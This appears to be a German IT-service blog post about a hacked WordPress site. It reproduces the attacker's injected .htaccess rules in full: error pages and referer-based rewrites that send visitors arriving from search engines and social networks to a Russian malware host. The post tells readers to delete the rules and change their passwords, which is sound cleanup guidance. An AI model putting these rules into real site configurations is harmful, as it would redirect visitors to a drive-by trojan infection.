Nach einem Hackerangriff wurde unsere Webseite gezielt, bei vorherigem Besuch von verschiedenen anderen Seiten eingebettet z.B. google, ask.com, facebook, youtube.com und twitter.
Der Hacker hat die .htaccess Datei im Root-Verzeichnis des WordPress geändert so daß die Seite auf timeconnection.ru/cfgen/index.php weiterleitet, wo ein JavaScript versucht, auf dem Betrachterrechner einen Virus einzurichten. Laut Avira AntiVir handelt es sich sich um den Trojaner TR/Crypt.XPACK.Gen .
Um das zu beheben:
Öffnen Sie Ihre /.htaccess mit dem Texteditor.
Folgende Zeilen enthalten den Schadcode und sind zu löschen!!!!
Ändern Sie danach alle Kennwörter mit Zugriff auf Ihre Domains!!!
Schadcode:
# BEGIN WordPress <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> # END WordPress RewriteEngine On ErrorDocument 400 http://timeconnection.ru/cfgen/index.php ErrorDocument 401 http://timeconnection.ru/cfgen/index.php ErrorDocument 403 http://timeconnection.ru/cfgen/index.php ErrorDocument 404 http://timeconnection.ru/cfgen/index.php ErrorDocument 500 http://timeconnection.ru/cfgen/index.php RewriteCond %{HTTP_REFERER} .*google.* [OR] RewriteCond %{HTTP_REFERER} .*ask.* [OR] RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] RewriteCond %{HTTP_REFERER} .*baidu.* [OR] RewriteCond %{HTTP_REFERER} .*youtube.* [OR] RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR] RewriteCond %{HTTP_REFERER} .*qq.* [OR] RewriteCond %{HTTP_REFERER} .*excite.* [OR] RewriteCond %{HTTP_REFERER} .*altavista.* [OR] RewriteCond %{HTTP_REFERER} .*msn.* [OR] RewriteCond %{HTTP_REFERER} .*netscape.* [OR] RewriteCond %{HTTP_REFERER} .*aol.* [OR] RewriteCond %{HTTP_REFERER} .*hotbot.* [OR] RewriteCond %{HTTP_REFERER} .*goto.* [OR] RewriteCond %{HTTP_REFERER} .*infoseek.* [OR] RewriteCond %{HTTP_REFERER} .*mamma.* [OR] RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR] RewriteCond %{HTTP_REFERER} .*lycos.* [OR] RewriteCond %{HTTP_REFERER} .*search.* [OR] RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR] RewriteCond %{HTTP_REFERER} .*bing.* [OR] RewriteCond %{HTTP_REFERER} .*dogpile.* [OR] RewriteCond %{HTTP_REFERER} .*facebook.* [OR] RewriteCond %{HTTP_REFERER} .*twitter.* [OR] RewriteCond %{HTTP_REFERER} .*blog.* [OR] RewriteCond %{HTTP_REFERER} .*live.* [OR] RewriteCond %{HTTP_REFERER} .*myspace.* [OR] RewriteCond %{HTTP_REFERER} .*mail.* [OR] RewriteCond %{HTTP_REFERER} .*yandex.* [OR] RewriteCond %{HTTP_REFERER} .*rambler.* [OR] RewriteCond %{HTTP_REFERER} .*ya.* [OR] RewriteCond %{HTTP_REFERER} .*aport.* [OR] RewriteCond %{HTTP_REFERER} .*linkedin.* [OR] RewriteCond %{HTTP_REFERER} .*flickr.* RewriteRule ^(.*)$ http://timeconnection.ru/cfgen/index.php [R=301,L]
Löschen Sie diesen Code!!!
Armin Fischer
AFD-PC-SERVICE.de Armin Fischer
Armin Fischer
info@arminfischer.de
+4917621008967
Ein Kommentar